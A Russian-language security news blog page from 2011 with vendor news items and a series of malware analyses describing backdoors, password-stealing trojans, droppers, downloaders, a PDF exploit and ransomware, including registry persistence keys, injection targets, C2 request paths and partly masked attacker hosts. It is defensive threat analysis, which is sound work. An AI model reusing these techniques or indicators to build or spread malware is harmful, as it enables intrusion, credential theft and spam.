четверг, 20 января 2011 г.

Microsoft выпустила ПО для системного анализа безопасности

Microsoft выпустила программное обеспечение для помощи разработчикам в написании более безопасных и стабильных приложений за счет составления полного отчета системных событий в моменты инсталляции и работы программного обеспечения. Новое программное обеспечение Attack Surface Analyzer представляет собой бесплатное средство для верификации и анализа изменений в состоянии системы, параметров исполнения и защищаемых объектов в Windows.

Новое программное обеспечение выпущено в рамках платформы Microsoft Secure Development Lifecycle. Оно позволяет делать мгновенные снимки системы и сравнивать их с результатами до и после инсталляции и запуска приложения. За счет изменений разработчик может выявить наиболее слабые элементы в созданном коде.

"Разработка одновременно предоставляет обзор изменений в окружении программного обеспечения, что важно для обеспечения комплексной безопасности компьютеров и предотвращения хакерских атак", - говорит Девид Ладд, старший программный менеджер Microsoft по продуктам безопасности.

Среди элементов, которые проверяет программа называются: новые файлы, ключи реестра, системные сервисы, элементы ActiveX, прослушиваемые порты и списки контроля доступа. Программное обеспечение доступно бесплатно, но пока оно находится в стадии бета-версии.

Скачать разработку можно по адресу https://www.microsoft.com/downloads/en/details.aspx?FamilyID=1283b765-f57d-4ebb-8f0a-c49c746b44b9&displaylang=en&pf=true .

Подробнее о проекте можно узнать по адресу http://www.microsoft.com/security/sdl .

"Лаборатория Касперского" объявляет о партнерстве с глобальным фондом прямых инвестиций

General Atlantic становится вторым по величине акционером компании.

"Лаборатория Касперского" сообщает о начале партнерских
отношений с глобальным фондом прямых инвестиций General Atlantic LLC
(GA). Сотрудничество с GA станет для компании очередным шагом в рамках
реализации стратегии, направленной на расширение рынков сбыта и
глобальный рост. После завершения сделки по приобретению части вторичных
акций GA станет вторым по величине акционером компании. Финансовые
подробности сделки не раскрываются.

Евгений Касперский, генеральный директор, соучредитель и владелец
контрольного пакета акций ЛК, комментируя сделку, отметил:
"Компания продолжает движение к достижению самых амбициозных целей
на мировом рынке информационной безопасности - как в
потребительском, так и в корпоративном сегментах. Сотрудничество с
General Atlantic, обладающим уникальным 30-летним опытом работы с
быстрорастущими технологическими компаниями во всем мире, принесет
дополнительную стратегическую экспертизу, необходимую компании для
реализации долгосрочной стратегии".

Джон Бернштайн (John Bernstein), управляющий директор и глава
европейского подразделения GA, также прокомментировал данное событие:
""Лаборатория Касперского" - одна из самых
динамично развивающихся IT-компаний мира, обладающая лучшей на
сегодняшний момент технологией защиты от компьютерных угроз. На нас
произвёл сильное впечатление уровень менеджмента. Бизнес компании удачно
позиционирован. Мы рады возможности сотрудничества с таким признанным
экспертом как Евгений Касперский и с интересом ожидаем совместной работы
с командой "Лаборатории"".

Наталья Касперская, председатель совета директоров, соучредитель и один
из ключевых миноритарных акционеров ЛК, так прокомментировала
соглашение: "Лаборатория Касперского" всегда развивалась
высокими темпами, которые и сегодня продолжают значительно превышать
средний в индустрии показатель. Разумеется, за последние 10 лет нам
поступало множество предложений от различных инвестиционных структур.
Однако до сих пор мы делали ставку на реализацию внутреннего потенциала
- и эта стратегия себя полностью оправдала. Сейчас
"Лаборатория" выходит на новый уровень развития, который, на
наш взгляд, требует долгосрочного сотрудничества с профессиональным
инвестором - стратегическим партнером, который позволит компании
расширить имеющиеся компетенции, поможет достичь необходимой
организационной зрелости. Я очень рада, что таким партнером стал General
Atlantic". О "Лаборатории Касперского"

"Лаборатория Касперского" - крупнейший в Европе
производитель систем защиты от вредоносного и нежелательно ПО, хакерских
атак и спама. Компания входит в четверку крупнейших мировых
производителей программных решений для обеспечения информационной
безопасности. Продукты компании защищают компьютеры и мобильные
устройства более 300 млн. пользователей во всем мире, технологии
используются в продуктах крупнейших мировых поставщиков программных и
аппаратных решений. "Лаборатория Касперского" представляет
собой группу компаний с центральным офисом в Москве, пятью
географическими дивизионами и десятками локальных представительств.
Подробнее о компании можно узнать на корпоративном сайте
www.kaspersky.ru. О последних событиях в сфере антивирусных, антиспам- и
других защитных технологий можно узнать на сайте www.securelist.com/ru.
О "General Atlantic"

General Atlantic - ведущий глобальный фонд прямых инвестиций,
оказывающий стратегическую поддержку и осуществляющий инвестиции в
динамично развивающиеся компании. GA сочетает глобальный подход к
сотрудничеству со знанием отраслевой специфики, долгосрочность
инвестиций с глубоким пониманием факторов роста.

Основанный в 1980 году, в настоящий момент фонд управляет инвестиционным
капиталом в размере около 17 млрд. долларов и объединяет более 75
высококвалифицированных специалистов в области инвестиций в Гринвиче,
Нью-Йорке, Пало Альто, Лондоне, Дюссельдорфе, Гонконге, Пекине, Мумбаи и
Сан-Пауло.

Ежегодные инвестиции GA составляют около 2 млрд. долларов со средним
размером (в 2010 году) более 200 млн. долларов. GA является
инвестиционным партнером более чем ста компаний, работающих на
глобальных рынках в сфере услуг и технологий. В числе настоящих и
прошлых капиталовложений GA входят ведущие технологические компании
мира, такие как: Lenovo, the Alibaba Group и SouFun в Китае; E*Trade,
Priceline и Network Solutions в США; Genpact в Индии; Mercardo Libre в
Латинской Америке; Markit и Privalia в Европе. Более подробную
информацию и список компаний, в которые инвестирует GA, можно посмотреть
на сайте www.generalatlantic.com.

Выпущен Dr.Web LiveCD 6.0

Компания «Доктор Веб» сообщает о выпуске новой, шестой версии бесплатного продукта для аварийного восстановления системы — Dr.Web LiveCD.
В Dr.Web LiveCD внесен целый ряд существенных добавлений и изменений, благодаря которым использование продукта стало еще удобнее, а помощь пораженной системе – более скорой и эффективной.
Был существенно доработан внешний вид программы: изменены графический интерфейс и фон рабочего стола, а также добавлены Центр управления и Карантин для изолирования инфицированных и подозрительных файлов. Также в новой версии предусмотрена система снапшотов, обеспечивающая возможность сохранения настроек и информации между сессиями.
В новой версии Dr.Web LiveCD присутствует утилита архивации ZIP, предназначенная для создания архивов, защищенных паролем, а также предусмотрена возможность обновления вирусных баз через прокси-сервер.
В числе исправленных ошибок – проблема несовместимости с аппаратным обеспечением (usb-клавиатуры и мыши), причина «падения» браузера Mozilla Firefox из-за нехватки памяти и ошибка, из-за которой неизлечимые файлы не удалялись из системы автоматически. Также улучшен механизм отправки подозрительных файлов на анализ.
DVD-диск с программным продуктом Dr.Web LiveCD, входящий в состав коробочных продуктов Dr.Web Security Space Pro, Dr.Web Бастион Pro и Антивирус Dr.Web Pro, сделан в виде загрузочного диска. Благодаря этому даже если компьютер уже заражен вирусами, его лечение возможно еще до установки Dr.Web в систему.
Также Dr.Web LiveCD 6.0 можно скачать бесплатно.

Описание работы вируса Backdoor.Win32. Buterat.afj

Вредоносная программа, предоставляющая злоумышленнику удаленный доступ к зараженной машине. Является приложением Windows (PE-EXE файл). Имеет размер 89088 байт. Упакована неизвестным упаковщиком. Распакованный размер – около 181 КБ. Написана на C++.

Инсталляция

После запуска бэкдор копирует свое тело в файл:
%APPDATA%\netprotocol.exe
При этом для противодействия сигнатурным анализаторам антивирусных программ, в копии модифицируются 2 байта:
Подвергнутая подобной модификации копия детектируется Антивирусом Касперского как "Trojan-PSW.Win32.Qbot.aem". Для автоматического запуска созданной копии при каждом следующем старте системы создается ключ системного реестра:
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"Netprotocol" = "%APPDATA%\netprotocol.exe"
Если данный ключ создать не удается, бэкдор создает ключ:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Netprotocol" = "%APPDATA%\netprotocol.exe"
После этого бэкдор запускает созданную копию на выполнение.

Деструктивная активность

Бэкдор способен копировать свое тело в файл:
%WorkDir%\netprotocol.dll
и, используя экспортируемую функцию "_ClearEvent@12", внедрять в адресное пространство процессов браузеров:
firefox.exe
iexplore.exe
opera.exe
исполняемый код, перехватывающий вызовы API-функций:
WSARecv
recv
send
библиотеки "ws2_32.dll". Таким образом, бэкдор получает возможность следить за входящим и исходящим трафиком браузеров, и по команде злоумышленника собирать информацию о поисковых запросах пользователя на сайты:
http://rupoisk.ru
http://ru.search.yahoo.com
http://www.bing.com
http://nigma.ru
http://search.qip.ru
http://nova.rambler.ru
http://www.google.ru
http://yandex.ru
а также перенаправлять пользователя на следующие ресурсы:
http://aut***gun.ru        
http://sear***tnik1.ru        
http://autoc***gun.ru
http://ppc***gun.ru
Также по команде злоумышленника бэкдор может обновлять свой исполняемый файл, загружая обновление с сервера злоумышленника. Кроме того, может загружаться файл, сохраняемый в рабочем каталоге бэкдора как:
%WorkDir%\netprotdrvss
После успешной загрузки файл запускается на выполнение. Запросы к серверу злоумышленника, к примеру, могут иметь следующий вид:
  • успешная установка бэкдора в системе:
    /nconfirm.php?rev=294&code=3 m=2&num=
    40401870851072
  • запрос на получение команды:
    /njob.php?num=&rev=294
  • запрос на загрузку файла "netprotdrvss":
    /nconfirm.php?rev=294&code=7 m=0&num
    =40401870851072
Число "" генерируется на основе текущего системного времени. Подстрока "" – имя сервера злоумышленника, может принимать значения:
http://sjd***sla.com
http://sa***d.com
http://se***nd.com
http://ha***rd.net
http://he***cy.com
На момент создания описания подключиться к указанным серверам не удалось. Имена команд, обрабатываемых бэкдором:
ZORKASITE
ZORKAFEED
BODYCLICK
KEYWORDS
RUPFEED
RUPPUBL
XMLFEED
REKLOSOFT
TEASERNET
MARKETGID
SUPERPOISK
RSCONTEXT
SPUTNIK
DIRECTST
GOOGADS
HOTLOGCH
LIVINETCH
BEGUNCH
UPDATE
SPLICEPROC
COOKREJCT
ZORKAFST
SEPARATEPROC
TERMINATE
DESTROY
Также после запуска бэкдор выполняет следующие действия:
  • будучи запущенным с параметрами:
    /updatefile3
    /updatefile2
    /updatefile1
    бэкдор обновляет свой исполняемый файл, загружая обновление с сервера злоумышленника.
  • Вызывая функцию "InternetClearAllPerSiteCookieDecisions", очищает содержимое ветви системного реестра:
    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\
    P3P\History]
  • Создает ключи системного реестра:
    [HKLM\Software\Microsoft\Netprotocol]
    "UniqueNum" = ""
    
    [HKCU\AppEvents\Schemes\Apps\Explorer\Navigating\.Current]
    "(Default)" = ""
    
    [HKCR\MIME\Database\Content Type\application/x-javascript]
    "CLSID" = "{25336920-03F9-11cf-8FD0-00AA00686F13}"
    
    [HKCR\MIME\Database\Content Type\text/javascript]
    "CLSID" = "{25336920-03F9-11cf-8FD0-00AA00686F13}"

Описание работы вируса Trojan-GameThief.Win32. OnLineGames.bnpj

Троянская программа, похищающая пароли пользователя. Является динамической библиотекой Windows (PE-DLL файл). Имеет размер 36865 байт. Написана на C++.

Деструктивная активность

Троянская библиотека предназначена для похищения паролей от пользовательских учетных записей игры "World of Warcraft". Для этого библиотека внедряется в адресное пространство процесса "wow.exe", после чего в системе находится окно с именем класса "GxWindowClassD3d" и заголовком "World of Warcraft". Из данного окна похищается информация, вводимая пользователем при входе в on-line игру. Собранная информация передается в виде параметров на следующий URL:
http://w***xe.com:888/houmen/wow.asp
Библиотека экспортирует функцию с именем "AR", при вызове которой создается ключ системного реестра:
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"rdllvz" = "RUNDLL32.EXE <полный путь к оригинальному 
файлу троянца>,w"
Таким образом, при каждом следующем старте системы посредством системной утилиты "RUNDLL32.EXE" из троянской библиотеки будет вызываться функция с именем "w". При вызове экспортируемой функции "w" выполняются следующие действия:
  • тело троянца копируется в файл:
    <Path>\msvcr70.dll 
    Значение подстроки "<Path>" считывается из ключа системного реестра:
    [HKLM\Software\Blizzard Entertainment\World of Warcraft]
    "GamePath"
  • В файл
    <Path>\wow.exe
    дописывается секция ".ngaut", содержащая код для внедрения библиотеки "<Path>\msvcr70.dll" в адресное пространство данного процесса. При этом точка входа "wow.exe" изменяется и указывает на код в дописанной секции.
  • Устанавливается хук-процедура, позволяющая отслеживать сообщения в системной очереди.
  • Создается ключ системного реестра:
    [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
    "rdllvz" = "RUNDLL32.EXE <полный путь к оригинальному 
    файлу троянца>,w"

Описание работы вируса Trojan-Dropper.Win32. Small.fvm

Троянская программа, позволяющая злоумышленнику использовать зараженную машину в качестве прокси-сервера без ведома пользователя. Является приложением Windows (PE-EXE файл). Имеет размер 41671 байт. Написана на C++.

Инсталляция

После запуска троянец копирует свое тело в следующий файл:
C:\RECYCLER\S-1-5-21-0243936033-3052116371-381863308
-1811\vsbntlo.exe
Также создается файл:
C:\RECYCLER\S-1-5-21-0243936033-3052116371-381863308
-1811\Desktop.ini
Для автоматического запуска созданной копии при каждом следующем старте системы создается ключ системного реестра:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"12CFG214-K641-12SF-N85P" = "C:\RECYCLER\S-1-5-21-
0243936033-3052116371-381863308-1811\vsbntlo.exe"

Деструктивная активность

После запуска троянец внедряет в адресное пространство процесса "EXPLORER.EXE" исполняемый код, реализующий следующий функционал:
  • устанавливается соединение с хостом:
    209.***.221
  • Запускается SOCKS прокси-сервер на TCP-порте 1199. После этого злоумышленник получает возможность использовать зараженную машину в качестве прокси-сервера.

Описание работы вируса Trojan-Dropper.Win32.Agent.dnvu

Троянская программа, которая устанавливает и запускает другое программное обеспечение на зараженном компьютере без ведома пользователя. Является приложением Windows (PE-EXE файл). Имеет размер 38056 байт. Написана на C++.

Деструктивная активность

После запуска троянец извлекает из своего тела вредоносный драйвер, который сохраняет под именами:
%Temp%\cdfss
%System%\drivers\wcscd.sys
Данный файл имеет размер 30560 байт и детектируется антивирусом Касперского как Rootkit.Win32.Agent.bkwm. После этого троянец устанавливает в системе вредоносный драйвер под видом служб с именами "cdfss" и "wcscd". При этом в системном реестре создаются следующие ключи:
[HKLM\System\CurrentControlSet\Services\cdfss]
"Type"=dword:00000001
"Start"=dword:00000001
"ImagePath"="%Temp%\cdfss"
"ProcessId"=dword:000008cc

[HKLM\System\CurrentControlSet\Services\cdfss\Enum]
"0"="Root\\LEGACY_CDFSS\\0000"
"Count"=dword:00000001
"NextInstance"=dword:00000001

[HKLM\System\CurrentControlSet\Services\wcscd]
"Type"=dword:00000001
"Start"=dword:00000001
"ImagePath"="%System%\drivers\wcscd.sys"

[HKLM\System\CurrentControlSet\Services\wcscd\Enum]
"0"="Root\\LEGACY_WCSCD\\0000"
"Count"=dword:00000001
"NextInstance"=dword:00000001
"INITSTARTFAILED"=dword:00000001
Затем используя функцию "NtLoadDriver()" загружает драйвер "cdfss" на выполнение.

Описание работы вируса Trojan-Dropper.Win32. Agent.cvva

Троянская программа, устанавливающая другие программы на компьютере пользователя без его ведома. Является приложением Windows (PE-EXE файл). Имеет размер 24064 байта. Упакована UPX. Распакованный размер – около 48 КБ. Написана на C++.

Деструктивная активность

После запуска троянец выполняет следующие действия:
  • извлекает из своего тела файл, который сохраняется в системе как %System%\mslaejjs.dll (36865 байт; детектируется Антивирусом Касперского как "Trojan-GameThief.Win32.OnLineGames.bnpj") Данная библиотека предназначена для похищения паролей от пользовательских учетных записей игры "World of Warcraft".
  • Запускает системную утилиту "Rundll32.exe" со следующими параметрами:
    %System%\mslaejjs.dll,w
    Таким образом, из извлеченной библиотеки вызывается функция с именем "w". При этом троянская библиотека будет инсталлирована в систему и подгружена в адресное пространство процесса "wow.exe". Также будет создан следующий ключ автозапуска системного реестра:
    [HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
    "rdllvz" = "RUNDLL32.EXE <полный путь к оригинальному 
    файлу троянца>,w" 
  • Находит в системе окно с именем класса "GxWindowClassD3d" и закрывает его, посылая сообщение WM_CLOSE.
  • Создает в своем рабочем каталоге сценарий командного интерпретатора, запускает его и завершает свою работу — данный сценарий удаляет оригинальный файл троянца и самоуничтожается. После этого троянец завершает свою работу.

Описание работы вируса Trojan-Downloader. Win32.Tiny.ajw

Троянская программа, которая без ведома пользователя скачивает на компьютер другое программное обеспечение и запускает его на исполнение. Является приложением Windows (PE-EXE файл). Имеет размер 11264 байт. Упакована неизвестным упаковщиком. Написана на С++.

Инсталляция

После запуска троянец копирует свой исполняемый файл в системный каталог Windows под именем:
%System%\v<rnd>.exe
где rnd - случайное десятичное число. Затем запускает копию своего файла на выполнение. Для автоматического запуска при каждом следующем старте системы троянец добавляет ссылку на свой исполняемый файл в ключ автозапуска системного реестра:
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"syswin"="%System%\v<rnd>.exe"

Деструктивная активность

После этого вредонос пытается выполнить загрузку файла, который размещается по ссылке:
http://zer***ace.com/gettime.php
и сохранить загруженный файл с именем:
С:\gettime.txt
На момент создания описания ссылка не работала. Далее троянец считывает содержимое файла "gettime.txt" и производит удаление файла. Содержимое файла сохраняется в ключе системного реестра:
[HKLM\Software\Microsoft\Windows\CurrentVersion]
"d"="содержимое_загруженного_файла"
Создает экземпляр компонента "InternetExplorer.Application". Также вредонос отправляет HTTP запрос по ссылке:
http://zer***ace.com/firststart.php

Описание работы вируса Trojan-Downloader.Win32. FraudLoad.gym

Троянская программа, загружающая файлы из сети Интернет без ведома пользователя и запускающая их. Является приложением Windows (PE-EXE файл). Имеет размер 44544 байта. Написана на C++.

Деструктивная активность

После запуска троянец выполняет следующие действия:
  • извлекает из своего тела файл, который сохраняется в каталоге хранения временных файлов текущего пользователя под случайным именем:
    %Temp%\<rnd>.vbs
    (2973 байта; детектируется Антивирусом Касперского как " Trojan-Downloader.Win32.FraudLoad.gym") где <rnd> – случайное восьмизначное шестнадцатеричное число (например: "4d0b7d84").
  • Запускает извлеченный файл при помощи системного командного интерпретатора:
    cmd.exe /c %Temp%\<rnd>.vbs
  • Для удаления своего оригинального файла после завершения его работы запускает системный командный интерпретатор с параметрами:
    /c del <полный путь к оригинальному файлу троянца> > nul
После этого троянец завершает свою работу. Извлеченный троянцем файл является VBS-скриптом, реализующим функционал загрузчика. После запуска данный файл, используя уязвимость в ActiveX компоненте "XMLHTTP", загружает из сети Интернет файл по следующей ссылке:
http://ka-k***gsystem-at.info/PCDefenderSilentSetup.msi 
(на момент создания описания ссылка не работала)
Благодаря уязвимости в ActiveX компоненте "ADODB.Stream" загруженный файл сохраняется в каталоге "My Documents" текущего пользователя под случайным именем:
%USERPROFILE%\My Documents\<rnd>\<rnd>.msi
Далее загруженный файл запускается на выполнение.

Описание работы вируса Trojan-Downloader.Win32. Agent.efuq

Троянская программа, загружающая файлы из сети Интернет без ведома пользователя и запускающая их. Является приложением Windows (PE-EXE файл). Имеет размер 20992 байта. Написана на C++.

Деструктивная активность

После запуска троянец читает из своего оригинального файла, расшифровывает и внедряет в адресное пространство своего процесса исполняемый код размером 16384 байта (детектируется Антивирусом Касперского как "Trojan-Downloader.Win32.Agent.cngp"). Внедренный код выполняет следующие действия:
  • устанавливает соединение с хостами:
    188.***.161   
    194.***.3
  • В случае успешного подключения, на указанные сервера отправляются HTTP-запросы:
    GET /varag_sdfgkwlkgadfshn.exe HTTP/1.0
    Host: 188.***.161
    
    GET /bat.exe HTTP/1.0
    Host: 188.***.161
    
    GET /varag_sdfgkwlkgadfshn.exe HTTP/1.0
    Host: 194.***.3
    
    GET /bat.exe HTTP/1.0
    Host: 194.***.3
  • В ответ на посланный запрос сервер злоумышленника отправляет поток зашифрованных данных, которые расшифровываются троянцем и записываются в файлы:
    %WinDir%\Temp\_ex-<rnd>.exe
    где <rnd> – случайные двухзначные десятичные числа. На момент создания описания файлы не загружались.
  • Запускает на выполнение загруженные файлы.

Описание работы вируса Exploit.JS. Pdfka.cdo

Программа-эксплоит, использующая для своего выполнения на компьютере пользователя уязвимости в продуктах Adobe – Reader и Acrobat. Является PDF документом содержащим сценарии языка Java Script. Имеет размер 4593 байта.

Деструктивная активность

Вредоносный PDF документ содержит в себе сжатый поток данных, который, после открытия документа, распаковывается и представляет собой обфусцированный сценарий Java Script. После выполнения расшифровки скрипта, эксплоит использует уязвимости, которые существуют при обработке методов util.printd(), Doc.media.newPlayer (CVE-2009-4324), при вызове функций Collab.collectEmailInfo() (CVE-2007-5659), Collab.GetIcon() (CVE-2009-0927) и util.printf() (CVE-2008-2992), в продуктах Adobe Reader и Adobe Acrobat версий 9.1, 8.1.4, 7.1.1 и более ранних. При успешной эксплуатации уязвимости, вредонос загружает файл, который находится по ссылке:
http://ko***m.ua/loading.php?spl=pdf_20apr
который сохраняется в каталоге хранения временных файлов текущего пользователя под именем:
%Temp%\e.exe
После этого вредонос запускает загруженный файл на выполнение. На момент создания описания ссылка не работала.

Описание работы вируса Trojan-Ransom.Win32. PornoBlocker.cop

Троянская программа, которая выполняет деструктивные действия на компьютере пользователя. Является приложением Windows (PE-EXE файл). Имеет размер 74752 байт. Упакована при помощи UPX. Распакованный размер – около 109 КБ. Написана на C++.

Инсталляция

После запуска троянец копирует свое тело со следующими именами:
%Documents and Settings%\%Current User%\wuaucldt.exe
%System%\wuaucldt.exe
Для автоматического запуска при каждом следующем старте системы троянец добавляет ссылки на свои исполняемые файлы в ключи автозапуска системного реестра:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"wuaucldt"="%Documents and Settings%\%Current User%\
wuaucldt.exe"

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"wuaucldt"="%System%\wuaucldt.exe"

Деструктивная активность

После создания копий своего исполняемого файла, вредонос, используя командную строку, удаляет свой оригинальный файл. Затем создает два именованных канала с именами:
\\.\pipe\firstmega1
\\.\pipe\secondmega2
После этого извлекает из своего тела файл, который сохраняет в каталоге хранения временных файлов текущего пользователя под именем:
%Temp%\NS<rnd>.tmp
где rnd – случайная цифробуквенная последовательность, например, "AB" или "A8". Данный файл имеет размер 38056 байт и детектируется антивирусом Касперского как Trojan-Dropper.Win32.Agent.dnvu. Далее троянец запускает вредоносный файл на выполнение. Извлеченный файл в свою очередь извлекает из своего тела вредоносный драйвер, который сохраняется под именами:
%Temp%\cdfss
%System%\drivers\wcscd.sys
Данный файл имеет размер 30560 байт и детектируется антивирусом Касперского как Rootkit.Win32.Agent.bkwm. После этого троянец устанавливает в системе вредоносный драйвер под видом служб с именами "cdfss" и "wcscd". При этом в системном реестре создаются следующие ключи:
[HKLM\System\CurrentControlSet\Services\cdfss]
"Type"=dword:00000001
"Start"=dword:00000001
"ImagePath"="%Temp%\cdfss"

"ProcessId"=dword:00000e48

[HKLM\System\CurrentControlSet\Services\cdfss\Enum]
"0"="Root\\LEGACY_CDFSS\\0000"
"Count"=dword:00000001
"NextInstance"=dword:00000001

[HKLM\System\CurrentControlSet\Services\wcscd]
"Type"=dword:00000001
"Start"=dword:00000001
"ImagePath"="%System%\drivers\wcscd.sys"
Используя данный драйвер троянец выполняет внедрение своего вредоносного кода в адресные пространства следующих процессов:
wuaucldt.exe
services.exe
svchost.exe
explorer.exe
Для контроля уникальности своего процесса в системе троянец создает уникальные идентификаторы с именами "scmservice_mutex", "MsSyncronizationManager", "MsArbiterManager". Противодействует завершению своего процесса "wuaucldt.exe", а также удалению параметров в ключах автозапуска системного реестра:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"wuaucldt"="%Documents and Settings%\%Current User%\
wuaucldt.exe"

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"wuaucldt"="%System%\wuaucldt.exe"
Устанавливает соединение со следующими хостами:
64.***.168:443
208.***.34:443
208.***.35:443
208.***.36:443
69.***.190:443
69.***.191:443
69.***.192:443
bla***ntom.com:443
ch***rash.com:443
ns***mer.com:443
n***amer.com:443
ang***uest.com:443
212.***.11:443
Далее на сервер злоумышленника отправляется GET-запрос на сервер
xx***Xx.com
после чего вредонос переходит в цикл ожидания команд. По команде злоумышленника троянец может рассылать спам, загружать на компьютер пользователя файлы, запускать процессы. Загруженные файлы сохраняются в каталоге хранения временных файлов пользователя как
%Temp%\nvhg0.tmp

Рассылка спам сообщений

Вредонос может осуществлять рассылку спам сообщений со следующих почтовых адресов:
c53***29.hinet.net
9f00a8***ehk.com
anar***mail.co.kr
w486***21.hinet.net
a75151***21.hinet.net
h086***s29.hinet.net
aserej***gs.ru
aminulf***ngone.co.kr
aher***mo.com.tw
k149***21.hinet.net
2e53c***inamobile.com
nancyh***ac.com
5fb4***a.biglobe.ne.jp
huffe***cite.com
celenemo***rland-group.com
andreethegi***tmail.com
myle***glefs.com.au
ezzie***w.net
re_sco***tusnet.com.au
price***ox.com
на почтовые адреса
jbish***cpa.com
jbar***achers21.org
jbis***tlan.org
jbish***orthoclinic.com
jbish***rossroadscenter.com
jbar***ral-net.com
jbirch***dland-mi.org
fandda***ci.net
fand***ci.net
jbreo***sd.k12.ms.us
jb***waiianisp.com
jbey***packersfan.com
jbra***acau.ctm.net
fand***ci.net
jblas***one.net
jbarthel***m.net
jb***net.net
jb***emountain.com
fand***i.net